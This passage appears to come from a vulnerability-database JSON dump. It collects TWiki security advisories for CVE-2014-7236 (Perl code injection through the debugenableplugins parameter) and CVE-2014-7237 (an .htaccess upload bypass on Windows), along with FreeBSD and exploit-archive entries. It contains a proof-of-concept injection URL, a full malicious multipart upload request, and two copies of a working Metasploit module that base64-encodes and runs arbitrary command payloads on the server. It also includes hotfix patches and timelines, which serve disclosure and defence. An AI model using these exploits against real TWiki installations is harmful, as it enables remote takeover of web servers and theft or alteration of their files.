Hotfix\r\n * Authors and Credits\r\n * Action Plan with Timeline\r\n * External Links\r\n * Feedback\r\n\r\n---++ Vulnerable Software Version\r\n\r\n * TWiki-6.0.0 (TWikiRelease06x00x00)\r\n * TWiki-5.1.x (TWikiRelease05x01x00 to TWikiRelease05x01x04)\r\n * TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02)\r\n * TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02)\r\n * TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04)\r\n * TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02)\r\n * TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05)\r\n\r\n---++ Vulnerable Software Version\r\n\r\n * TWiki-6.0.0 (TWikiRelease06x00x00)\r\n * TWiki-5.1.x (TWikiRelease05x01x00 to TWikiRelease05x01x04)\r\n * TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02)\r\n * TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02)\r\n * TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04)\r\n * TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02)\r\n * TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05)\r\n\r\n---++ Attack Vectors\r\n\r\nUsing an HTTP GET request towards a TWiki server, add a specially crafted 'debugenableplugins' request parameter to TWiki's view script (typically port 80/TCP). Prior authentication may or may not be necessary.\r\n\r\n---++ Impact\r\n\r\nA remote attacker can execute arbitrary Perl code to view and modify any file the webserver user has access to.\r\n\r\n---++ Severity Level\r\n\r\nThe TWiki SecurityTeam triaged this issue as documented in TWikiSecurityAlertProcess [1] and assigned the following severity level:\r\n\r\n * Severity 1 issue: The web server can be compromised \r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name CVE-2014-7236 [7] to this vulnerability. \r\n\r\n---++ Details\r\n\r\nIt is possible to execute arbitrary Perl code by adding a =debugenableplugins= parameter with a specially crafted value. Example:\r\n\r\nhttp://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint(\"Content-Type:text/html\\r\\n\\r\\nVulnerable!\")%3bexit\r\n\r\nThe TWiki site is vulnerable if you see a page with text \"Vulnerable!\".\r\n\r\n__Background:__\r\n\r\nTWiki allows enabling specific plugins for debug purposes using a 'debugenableplugins' parameter that lists the plugins to enable. In order to support this dynamic loading of plugins, TWiki inserts the plugin name into the following Perl =eval= statement without sanitizing the plugin name:\r\n<verbatim>\r\nmy $p = $this->{module};\r\neval \"use $p;\";\r\n</verbatim>\r\n\r\n---++ Countermeasures\r\n\r\n * Apply hotfix (see patch below).\r\n * Upgrade to the latest patched production release TWiki-6.0.1 (TWikiRelease06x00x01) [2]\r\n\r\n---++ Hotfix for TWiki Production Release 6.0.0\r\n\r\nApply the patch listed in the TWiki bug item at TWikibug:Item7558 [8]. The patch is also listed here, but due to whitespace changes in e-mail it is not recommended to use below patch.\r\n\r\nNOTE: In case you use a Perl accelerator make sure to clear the script cache. For example, in case of SpeedyCGI remove the speedy cache (tmp/speedy.*) before restarting Apache.\r\n\r\nAffected file: twiki/lib/TWiki/Plugins.pm\r\n\r\nPatch to sanitize the 'debugenableplugins' parameter:\r\n\r\n=======( 8>< CUT )===============================================\r\n--- TWiki/Plugins.pm.save1 2014-01-09 02:10:56.000000000 -0500\r\n+++ TWiki/Plugins.pm 2014-10-01 20:30:36.000000000 -0400\r\n@@ -186,8 +186,11 @@\r\n \r\n unless( $allDisabled ) {\r\n if ( $query && defined( $query->param( 'debugenableplugins' ))) {\r\n- @pluginList = split( /[,\\s]+/,\r\n- $query->param( 'debugenableplugins' ));\r\n+ @pluginList =\r\n+ grep { /Plugin$/ }\r\n+ map { s/[^a-zA-Z0-9]//go; $_ } # Item7558: Sanitize parameter\r\n+ split( /[,\\s]+/, $query->param( 'debugenableplugins' ));\r\n+\r\n } else {\r\n if( $TWiki::cfg{PluginsOrder} ) {\r\n foreach my $plugin( split( /[,\\s]+/,\r\n=======( 8>< CUT )===============================================\r\n\r\n---++ Hotfix for Older Affected TWiki Releases\r\n\r\nApply above patch (line numbers may vary).\r\n\r\n---++ Verify Hotfix\r\n\r\nTo verify the patch add the following parameter to any TWiki topic:\r\n\r\n?debugenableplugins=BackupRestorePlugin%3bprint(\"Content-Type:text/html\\r\\n\\r\\nVulnerable!\")%3bexit\r\n\r\nThe site is vulnerable if a page is returned with text \"Vulnerable!\"\r\n\r\n---++ Authors and Credits\r\n\r\n * Credit to Netanel Rubin (netanelr[at]checkpoint.com) for disclosing the issue to the [email\u00a0protected] list\r\n * PeterThoeny for creating the fix, patch and advisory\r\n * HideyoImazu for creating the TWiki-6.0.1 production release [2]\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2014-10-01 - Netanel Rubin of Check Point Software discloses issue to TWikiSecurityMailingList [4]\r\n * 2014-10-01 - developer verifies issue - PeterThoeny\r\n * 2014-10-01 - developer fixes code - PeterThoeny\r\n * 2014-10-05 - developer creates new TWiki-6.0.1 patch release [2] with fix - HideyoImazu\r\n * 2014-10-06 - security team creates advisory with hotfix - PeterThoeny\r\n * 2014-10-07 - send alert to TWikiAnnounceMailingList [5] and TWikiDevMailingList [6] - PeterThoeny\r\n * 2014-10-09 - publish advisory in Codev web and update all related topics - PeterThoeny\r\n * 2014-10-09 - issue a public security advisory to fulldisclosure[at]seclists.org, cert[at]cert.org, vuln[at]secunia.com, bugs[at]securitytracker.com, submissions[at]packetstormsecurity.org - PeterThoeny\r\n\r\n---++ External Links\r\n\r\n[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess\r\n[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01\r\n[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236 (will be created on 2014-10-09)\r\n[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList\r\n[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList\r\n[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList\r\n[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236 - CVE on MITRE.org\r\n[8]: http://develop.twiki.org/~twiki4/cgi-bin/view/Bugs/Item7558\r\n\r\n---++ Feedback\r\n\r\nPlease provide feedback at the security alert topic, http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236 once it exists (this topic will be created on Mon, 2014-10-09).\r\n\r\nPlease send an e-mail to [email\u00a0protected] if you have any questions before Monday.\r\n\r\n---++ Attack Vectors\r\n\r\nUse an HTTP POST request towards a TWiki on Windows server to upload a specially named file (typically port 80/TCP). Prior authentication is typically required.\r\n\r\n---++ Impact\r\n\r\nA remote attacker can upload a '.htaccess' file that may make uploaded files executable on the server.\r\n\r\n---++ Severity Level\r\n\r\nThe TWiki SecurityTeam triaged this issue as documented in TWikiSecurityAlertProcess and assigned the following severity level:\r\n\r\n * Severity 1 issue: The web server can be compromised \r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name CVE-2014-7237 [3] to this vulnerability. \r\n\r\n---++ Details\r\n\r\nIf you attach a file named '%00.htaccess.' (e.g. a '.htaccess' configuration file with a leading null character and a trailing dot) to a TWiki server on Windows, the attached file will be saved with name '.htaccess'. Under the assumption that the Apache is configured to allow directory lever configuration files, it is therefore possible to upload a configuration file that controls the attachment directory. This can be exploited to remotely upload and execute files on the TWiki server.\r\n\r\n__Background:__\r\n\r\nIn order to provide its users with dynamic content functionality, TWiki allows any sort of file to be uploaded and attached into articles and pages. This may seem like a dangerous thing to do, but TWiki protects itself in a pretty good way - It makes sure the file does not contain any dangerous extension (such as .php or .cgi) by using the following regex:\r\n\r\n^(\\.htaccess|.*\\.(?i)(?:php[0-9s]?(\\..*)?|[sp]htm[l]?(\\..*)?|pl|py|cgi))$\r\n\r\nAnd if it does, it adds a '.txt' extension at the end of it.\r\n\r\nOn top of that, TWiki also uses an .htaccess file with the 'Options None' directive, which prohibits any use of CGI execution, and with the PHP engine flag set to 'Off', which as one can understand - disables PHP execution.\r\n\r\nApart from all these defenses, TWiki makes sure it uses only the base name of the uploaded file (The file name without any directory path), it removes any trailing dots, and removes any dangerous characters (Such as the famous Null Byte). These security measurements leave us with almost nothing to do. Even without the Perl based defenses, the .htaccess file does a pretty good job in securing the upload directory against any kind of code execution. So, the only logical thing to do is try to upload an .htaccess file directly into the upload folder in order to bypass the original .htaccess file that's located at the root of the TWiki 'pub' directory.\r\n\r\nIn order to do that we first must upload a file that starts with a dot. In order to do that let's look at the steps TWiki takes in order to secure the file name - first it takes the file name without any directory path, then it removes any leading dots, then it removes any dangerous characters, and finally it checks the file name using the mentioned regex.\r\n\r\nSo, uploading a file named '.htaccess' just won't work because of the trailing dots removal. But, what if we'll use a file name like '%00.htaccess'? TWiki will first try to remove any leading dots, but because the name doesn't have any (Because of the leading null byte) none will be removed. Then it will remove any dangerous characters - our null byte - and that will leave us with a nice clean '.htaccess' name.\r\n\r\nBut, what about the regex? We can see the regex only checks for a file named specifically '.htaccess'. For example, a file named '.htaccesstest' will be uploaded successfully.\r\n\r\nBut what can we do with that? Well, in Windows, file names ending with a dot will be changed - the dot will be removed. That means uploading a file named '.htaccess.' will pass the regex check, and the dot will be removed when storing the file, resulting in a file named '.htaccess'.\r\n\r\nSo, if we upload a file named '%00.htaccess.' and it contains the 'Options' directive as 'All' and the 'SetHandler' directive to allow CGI-scripts to be executed under a different extension, we will be able to execute code on the server.\r\n\r\n__Example attack post:__\r\n\r\n=======( 8>< CUT )===============================================\r\nPOST /Research/TWiki-6.0.0/bin/upload.cgi/Main/WebHome HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7AqcZ2eUSlxvoRFj\r\nCookie: TWIKISID=e7df45fd5e783fd6a44391dadd782c43\r\nContent-Length: 391\r\n\r\n------WebKitFormBoundary7AqcZ2eUSlxvoRFj\r\nContent-Disposition: form-data; name=\"crypttoken\"\r\n\r\n22b989482d3418971a50f4914dca0dcf\r\n------WebKitFormBoundary7AqcZ2eUSlxvoRFj\r\nContent-Disposition: form-data; name=\"filepath2\"; filename=\"%00.htaccess.\"\r\nContent-Type: text/plain\r\n\r\nOptions All\r\n<FilesMatch \\.lolz$>\r\n SetHandler cgi-script\r\n</FilesMatch>\r\n=======( 8>< CUT )===============================================\r\n\r\n---++ Countermeasures\r\n\r\n * Apply hotfix (see patch below), or\r\n * Upgrade to the latest patched production release TWiki-6.0.1 (TWikiRelease06x00x01) [2]\r\n\r\n---++ Hotfix for TWiki Production Release 6.0.0\r\n\r\nApply the patch listed in the TWiki bug item at TWikibug:Item7560 [8]. The patch is also listed here, but due to whitespace changes in e-mail it is not recommended to use below patch.\r\n\r\nNOTE: In case you use a Perl accelerator make sure to clear the script cache. For example, in case of SpeedyCGI remove the speedy cache (tmp/speedy.*) before restarting Apache.\r\n\r\nAffected file: twiki/lib/TWiki/Sandbox.pm\r\n\r\nPatch to sanitize uploaded file names:\r\n\r\n=======( 8>< CUT )===============================================\r\n--- TWiki/Sandbox.pm.save1 2014-10-01 19:50:45.000000000 -0400\r\n+++ TWiki/Sandbox.pm 2014-10-01 20:13:31.000000000 -0400\r\n@@ -194,8 +194,11 @@\r\n # remember to test with IE. \r\n $fileName =~ s{[\\\\/]+$}{}; # Get rid of trailing slash/backslash (unlikely)\r\n $fileName =~ s!^.*[\\\\/]!!; # Get rid of directory part\r\n+ $fileName =~ s/[\\x00-\\x19]//go; # Item7560: Remove non-printable characters\r\n \r\n my $origName = $fileName;\r\n+ # Item7560: Strip trailing dots\r\n+ $fileName =~ s/\\.*$//o;\r\n # Change spaces to underscore\r\n $fileName =~ s/ /_/go;\r\n # Strip dots and slashes at start\r\n@@ -214,6 +217,11 @@\r\n # Append .txt to some files\r\n $fileName =~ s/$TWiki::cfg{UploadFilter}/$1\\.txt/goi;\r\n \r\n+ # Item7483, prevent a null file name\r\n+ if ( $fileName eq '' || $fileName =~ /^\\./ ) {\r\n+ $fileName = '_' . $fileName;\r\n+ }\r\n+ \r\n # Untaint\r\n $fileName = untaintUnchecked($fileName);\r\n\r\n=======( 8>< CUT )===============================================\r\n\r\n---++ Hotfix for Older Affected TWiki Releases\r\n\r\nApply above patch (line numbers may vary).\r\n\r\n---++ Verify Hotfix\r\n\r\nTo verify the patch, upload a file with a POST as described in the details. Use any other non-printable character if you can't create a file with a null character, such as '%01.htaccess.'\r\n\r\n---++ Authors and Credits\r\n\r\n * Credit to Netanel Rubin (netanelr[at]checkpoint.com) for disclosing the issue with detailed description to the [email\u00a0protected] mailing list\r\n * PeterThoeny for creating the fix, patch and advisory\r\n * HideyoImazu for creating the TWiki-6.0.1 production release [2]\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2014-10-01 - Netanel Rubin of Check Point Software discloses issue to TWikiSecurityMailingList [4]\r\n * 2014-10-01 - developer verifies issue - PeterThoeny\r\n * 2014-10-01 - developer fixes code - PeterThoeny\r\n * 2014-10-05 - developer creates new TWiki-6.0.1 patch release [2] with fix - HideyoImazu\r\n * 2014-10-06 - security team creates advisory with hotfix - PeterThoeny\r\n * 2014-10-07 - send alert to TWikiAnnounceMailingList [5] and TWikiDevMailingList [6] - PeterThoeny\r\n * 2014-10-09 - publish advisory in Codev web and update all related topics - PeterThoeny\r\n * 2014-10-09 - issue a public security advisory to fulldisclosure[at]seclists.org, cert[at]cert.org, vuln[at]secunia.com, bugs[at]securitytracker.com, submissions[at]packetstormsecurity.org - PeterThoeny\r\n\r\n---++ External Links\r\n\r\n[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess\r\n[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01\r\n[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7237 (will be created on 2014-10-09)\r\n[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList\r\n[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList\r\n[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList\r\n[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7237 - CVE on MITRE.org\r\n[8]: http://develop.twiki.org/~twiki4/cgi-bin/view/Bugs/Item7560\r\n\r\n---++ Feedback\r\n\r\nPlease provide feedback at the security alert topic, http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7237 once it exists (this topic will be created on Mon, 2014-10-09).\r\n\r\nPlease send an e-mail to [email\u00a0protected] if you have any questions before Monday.\r\n\r\n-- Peter Thoeny - 2014-10-09\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22741"}], "freebsd": [{"lastseen": "2016-09-26T17:24:23", "bulletinFamily": "unix", "description": "\nTWiki developers report:\n\nThe debugenableplugins request parameter allows arbitrary\n\t Perl code execution.\nUsing an HTTP GET request towards a TWiki server,\n\t add a specially crafted debugenableplugins request parameter\n\t to TWiki's view script (typically port 80/TCP).\n\t Prior authentication may or may not be necessary.\nA remote attacker can execute arbitrary Perl code\n\t to view and modify any file the webserver user has access to.\nExample: http://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint(\"Content-Type:text/html\\r\\n\\r\\nVulnerable!\")%3bexit\nThe TWiki site is vulnerable if you see a page with text\n\t \"Vulnerable!\".\n\n", "modified": "2014-10-09T00:00:00", "published": "2014-10-09T00:00:00", "href": "https://vuxml.freebsd.org/freebsd/21ce1840-6107-11e4-9e84-0022156e8794.html", "id": "21CE1840-6107-11E4-9E84-0022156E8794", "title": "twiki -- remote Perl code execution", "type": "freebsd", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:47", "bulletinFamily": "exploit", "description": "", "modified": "2014-10-10T00:00:00", "published": "2014-10-10T00:00:00", "href": "https://packetstormsecurity.com/files/128623/Twiki-Perl-Code-Execution.html", "id": "PACKETSTORM:128623", "type": "packetstorm", "title": "Twiki Perl Code Execution", "sourceData": "`This is an advisory for TWiki administrators: The debugenableplugins request parameter allows arbitrary Perl code execution. \n \nTWiki ( http://twiki.org ) is an Open Source Enterprise Wiki and Web Application Platform used by millions of people. \n \n* Vulnerable Software Version \n* Attack Vectors \n* Impact \n* Severity Level \n* MITRE Name for this Vulnerability \n* Details \n* Countermeasures \n* Hotfix for TWiki Production Release 6.0.0 \n* Hotfix for Older Affected TWiki Releases \n* Verify Hotfix \n* Authors and Credits \n* Action Plan with Timeline \n* External Links \n* Feedback \n \n---++ Vulnerable Software Version \n \n* TWiki-6.0.0 (TWikiRelease06x00x00) \n* TWiki-5.1.x (TWikiRelease05x01x00 to TWikiRelease05x01x04) \n* TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02) \n* TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02) \n* TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04) \n* TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02) \n* TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05) \n \n---++ Attack Vectors \n \nUsing an HTTP GET request towards a TWiki server, add a specially crafted 'debugenableplugins' request parameter to TWiki's view script (typically port 80/TCP). Prior authentication may or may not be necessary. \n \n---++ Impact \n \nA remote attacker can execute arbitrary Perl code to view and modify any file the webserver user has access to. \n \n---++ Severity Level \n \nThe TWiki SecurityTeam triaged this issue as documented in TWikiSecurityAlertProcess [1] and assigned the following severity level: \n \n* Severity 1 issue: The web server can be compromised \n \n---++ MITRE Name for this Vulnerability \n \nThe Common Vulnerabilities and Exposures project has assigned the name CVE-2014-7236 [7] to this vulnerability. \n \n---++ Details \n \nIt is possible to execute arbitrary Perl code by adding a =debugenableplugins= parameter with a specially crafted value. Example: \n \nhttp://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint(\"Content-Type:text/html\\r\\n\\r\\nVulnerable!\")%3bexit \n \nThe TWiki site is vulnerable if you see a page with text \"Vulnerable!\". \n \n__Background:__ \n \nTWiki allows enabling specific plugins for debug purposes using a 'debugenableplugins' parameter that lists the plugins to enable. In order to support this dynamic loading of plugins, TWiki inserts the plugin name into the following Perl =eval= statement without sanitizing the plugin name: \n<verbatim> \nmy $p = $this->{module}; \neval \"use $p;\"; \n</verbatim> \n \n---++ Countermeasures \n \n* Apply hotfix (see patch below). \n* Upgrade to the latest patched production release TWiki-6.0.1 (TWikiRelease06x00x01) [2] \n \n---++ Hotfix for TWiki Production Release 6.0.0 \n \nApply the patch listed in the TWiki bug item at TWikibug:Item7558 [8]. The patch is also listed here, but due to whitespace changes in e-mail it is not recommended to use below patch. \n \nNOTE: In case you use a Perl accelerator make sure to clear the script cache. For example, in case of SpeedyCGI remove the speedy cache (tmp/speedy.*) before restarting Apache. \n \nAffected file: twiki/lib/TWiki/Plugins.pm \n \nPatch to sanitize the 'debugenableplugins' parameter: \n \n=======( 8>< CUT )=============================================== \n--- TWiki/Plugins.pm.save1 2014-01-09 02:10:56.000000000 -0500 \n+++ TWiki/Plugins.pm 2014-10-01 20:30:36.000000000 -0400 \n@@ -186,8 +186,11 @@ \n \nunless( $allDisabled ) { \nif ( $query && defined( $query->param( 'debugenableplugins' ))) { \n- @pluginList = split( /[,\\s]+/, \n- $query->param( 'debugenableplugins' )); \n+ @pluginList = \n+ grep { /Plugin$/ } \n+ map { s/[^a-zA-Z0-9]//go; $_ } # Item7558: Sanitize parameter \n+ split( /[,\\s]+/, $query->param( 'debugenableplugins' )); \n+ \n} else { \nif( $TWiki::cfg{PluginsOrder} ) { \nforeach my $plugin( split( /[,\\s]+/, \n=======( 8>< CUT )=============================================== \n \n---++ Hotfix for Older Affected TWiki Releases \n \nApply above patch (line numbers may vary). \n \n---++ Verify Hotfix \n \nTo verify the patch add the following parameter to any TWiki topic: \n \n?debugenableplugins=BackupRestorePlugin%3bprint(\"Content-Type:text/html\\r\\n\\r\\nVulnerable!\")%3bexit \n \nThe site is vulnerable if a page is returned with text \"Vulnerable!\" \n \n---++ Authors and Credits \n \n* Credit to Netanel Rubin (netanelr[at]checkpoint.com) for disclosing the issue to the twiki-security@lists.sourceforge.netmailing list \n* PeterThoeny for creating the fix, patch and advisory \n* HideyoImazu for creating the TWiki-6.0.1 production release [2] \n \n---++ Action Plan with Timeline \n \n* 2014-10-01 - Netanel Rubin of Check Point Software discloses issue to TWikiSecurityMailingList [4] \n* 2014-10-01 - developer verifies issue - PeterThoeny \n* 2014-10-01 - developer fixes code - PeterThoeny \n* 2014-10-05 - developer creates new TWiki-6.0.1 patch release [2] with fix - HideyoImazu \n* 2014-10-06 - security team creates advisory with hotfix - PeterThoeny \n* 2014-10-07 - send alert to TWikiAnnounceMailingList [5] and TWikiDevMailingList [6] - PeterThoeny \n* 2014-10-09 - publish advisory in Codev web and update all related topics - PeterThoeny \n* 2014-10-09 - issue a public security advisory to fulldisclosure[at]seclists.org, cert[at]cert.org, vuln[at]secunia.com, bugs[at]securitytracker.com, submissions[at]packetstormsecurity.org - PeterThoeny \n \n---++ External Links \n \n[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess \n[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01 \n[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236 (will be created on 2014-10-09) \n[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList \n[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList \n[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList \n[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236 - CVE on MITRE.org \n[8]: http://develop.twiki.org/~twiki4/cgi-bin/view/Bugs/Item7558 \n \n---++ Feedback \n \nPlease provide feedback at the security alert topic, http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236 once it exists (this topic will be created on Mon, 2014-10-09). \n \nPlease send an e-mail to twiki-security@lists.sourceforge.net if you have any questions before Monday. \n \n-- Peter Thoeny - 2014-10-09 \n \n \n-- \n> Peter Thoeny - Peter09[at]Thoeny.org \n> http://bit.ly/MrTWiki - consulting on enterprise collaboration \n> http://TWiki.org - is your team already TWiki enabled? \n> Knowledge cannot be managed, it can be discovered and shared \n> This e-mail is: (_) private (_) ask first (x) public \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/128623/twiki-debugexec.txt"}, {"lastseen": "2016-12-05T22:21:04", "bulletinFamily": "exploit", "description": "", "modified": "2015-03-19T00:00:00", "published": "2015-03-19T00:00:00", "href": "https://packetstormsecurity.com/files/130906/TWiki-Debugenableplugins-Remote-Code-Execution.html", "id": "PACKETSTORM:130906", "type": "packetstorm", "title": "TWiki Debugenableplugins Remote Code Execution", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TWiki Debugenableplugins Remote Code Execution', \n'Description' => %q{ \nTWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality. \nThe value of the debugenableplugins parameter is used without proper sanitization \nin an Perl eval statement which allows remote code execution \n}, \n'Author' => \n[ \n'Netanel Rubin', # from Check Point - Discovery \n'h0ng10', # Metasploit Module \n \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-7236'], \n[ 'OSVDB', '112977'], \n[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236'] \n], \n'Privileged' => false, \n'Targets' => \n[ \n[ 'Automatic', \n{ \n'Payload' => \n{ \n'BadChars' => \"\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl python php', \n} \n}, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Oct 09 2014')) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"TWiki path\", '/do/view/Main/WebHome' ]), \nOptString.new('PLUGIN', [true, \"A existing TWiki Plugin\", 'BackupRestorePlugin']) \n], self.class) \nend \n \n \ndef send_code(perl_code) \nuri = target_uri.path \ndata = \"debugenableplugins=#{datastore['PLUGIN']}%3b\" + CGI.escape(perl_code) + \"%3bexit\" \n \nres = send_request_cgi!({ \n'method' => 'POST', \n'uri' => uri, \n'data' => data \n}) \n \nreturn res \nend \n \n \ndef check \nrand_1 = rand_text_alpha(5) \nrand_2 = rand_text_alpha(5) \n \ncode = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n#{rand_1}\\\".\\\"#{rand_2}\\\")\" \nres = send_code(code) \n \nif res and res.code == 200 \nreturn CheckCode::Vulnerable if res.body == rand_1 + rand_2 \nend \nCheckCode::Unknown \nend \n \n \ndef exploit \ncode = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n\\\");\" \ncode += \"require('MIME/Base64.pm');MIME::Base64->import();\" \ncode += \"system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit\" \nres = send_code(code) \nhandler \n \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/130906/twiki_debug_plugins.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2019-12-05T07:25:22", "bulletinFamily": "exploit", "description": "TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution.\n", "modified": "2017-07-24T13:26:21", "published": "2015-03-18T08:45:08", "id": "MSF:EXPLOIT/UNIX/HTTP/TWIKI_DEBUG_PLUGINS", "href": "", "type": "metasploit", "title": "TWiki Debugenableplugins Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TWiki Debugenableplugins Remote Code Execution',\n 'Description' => %q{\n TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality.\n The value of the debugenableplugins parameter is used without proper sanitization\n in an Perl eval statement which allows remote code execution.\n },\n 'Author' =>\n [\n 'Netanel Rubin', # from Check Point - Discovery\n 'h0ng10', # Metasploit Module\n\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-7236'],\n [ 'OSVDB', '112977'],\n [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']\n ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Automatic',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl python php',\n }\n },\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Oct 09 2014'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"TWiki path\", '/do/view/Main/WebHome' ]),\n OptString.new('PLUGIN', [true, \"A existing TWiki Plugin\", 'BackupRestorePlugin'])\n ])\n end\n\n\n def send_code(perl_code)\n uri = target_uri.path\n data = \"debugenableplugins=#{datastore['PLUGIN']}%3b\" + CGI.escape(perl_code) + \"%3bexit\"\n\n res = send_request_cgi!({\n 'method' => 'POST',\n 'uri' => uri,\n 'data' => data\n })\n\n return res\n end\n\n\n def check\n rand_1 = rand_text_alpha(5)\n rand_2 = rand_text_alpha(5)\n\n code = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n#{rand_1}\\\".\\\"#{rand_2}\\\")\"\n res = send_code(code)\n\n if res and res.code == 200\n return CheckCode::Vulnerable if res.body == rand_1 + rand_2\n end\n CheckCode::Unknown\n end\n\n\n def exploit\n code = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n\\\");\"\n code += \"require('MIME/Base64.pm');MIME::Base64->import();\"\n code += \"system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit\"\n res = send_code(code)\n handler\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/http/twiki_debug_plugins.rb"}]}